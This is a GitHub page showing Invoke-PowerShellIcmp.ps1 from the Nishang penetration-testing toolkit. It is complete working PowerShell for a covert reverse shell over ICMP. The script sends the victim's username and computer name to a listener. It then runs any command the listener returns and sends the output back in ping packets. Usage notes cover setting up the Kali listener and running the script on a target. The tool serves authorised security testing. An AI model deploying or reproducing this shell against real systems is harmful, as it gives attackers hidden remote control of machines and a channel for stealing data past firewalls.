-
Notifications
You must be signed in to change notification settings - Fork 2.5k
/
Copy pathInvoke-PowerShellIcmp.ps1
112 lines (88 loc) · 4.03 KB
/
Invoke-PowerShellIcmp.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
function Invoke-PowerShellIcmp
{
<#
.SYNOPSIS
Nishang script which can be used for a Reverse interactive PowerShell from a target over ICMP.
.DESCRIPTION
This script can receive commands from a server, execute them and return the result to the server using only ICMP.
The server to be used with it is icmpsh_m.py from the icmpsh tools (/~https://github.com/inquisb/icmpsh).
.PARAMETER IPAddress
The IP address of the server/listener to connect to.
.PARAMETER Delay
Time in seconds for which the script waits for a command from the server. Default is 5 seconds.
.PARAMETER BufferSize
The size of output Buffer. Defualt is 128.
.EXAMPLE
# sysctl -w net.ipv4.icmp_echo_ignore_all=1
# python icmpsh_m.py 192.168.254.226 192.168.254.1
Run above commands to start a listener on a Linux computer (tested on Kali Linux).
icmpsh_m.py is a part of the icmpsh tools.
On the target, run the below command.
PS > Invoke-PowerShellIcmp -IPAddress 192.168.254.226
Above shows an example of an interactive PowerShell reverse connect shell.
.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html
/~https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $true)]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $false)]
[Int]
$Delay = 5,
[Parameter(Position = 2, Mandatory = $false)]
[Int]
$BufferSize = 128
)
#Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response
$ICMPClient = New-Object System.Net.NetworkInformation.Ping
$PingOptions = New-Object System.Net.NetworkInformation.PingOptions
$PingOptions.DontFragment = $True
# Shell appearance and output redirection based on Powerfun - Written by Ben Turner & Dave Hardy
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
while ($true)
{
$sendbytes = ([text.encoding]::ASCII).GetBytes('')
$reply = $ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions)
#Check for Command from the server
if ($reply.Buffer)
{
$response = ([text.encoding]::ASCII).GetString($reply.Buffer)
$result = (Invoke-Expression -Command $response 2>&1 | Out-String )
$sendbytes = ([text.encoding]::ASCII).GetBytes($result)
$index = [math]::floor($sendbytes.length/$BufferSize)
$i = 0
#Fragmant larger output into smaller ones to send to the server.
if ($sendbytes.length -gt $BufferSize)
{
while ($i -lt $index )
{
$sendbytes2 = $sendbytes[($i*$BufferSize)..(($i+1)*$BufferSize-1)]
$ICMPClient.Send($IPAddress,60 * 10000, $sendbytes2, $PingOptions) | Out-Null
$i +=1
}
$remainingindex = $sendbytes.Length % $BufferSize
if ($remainingindex -ne 0)
{
$sendbytes2 = $sendbytes[($i*$BufferSize)..($sendbytes.Length)]
$ICMPClient.Send($IPAddress,60 * 10000, $sendbytes2, $PingOptions) | Out-Null
}
}
else
{
$ICMPClient.Send($IPAddress,60 * 10000, $sendbytes, $PingOptions) | Out-Null
}
$sendbytes = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
}
else
{
Start-Sleep -Seconds $Delay
}
}
}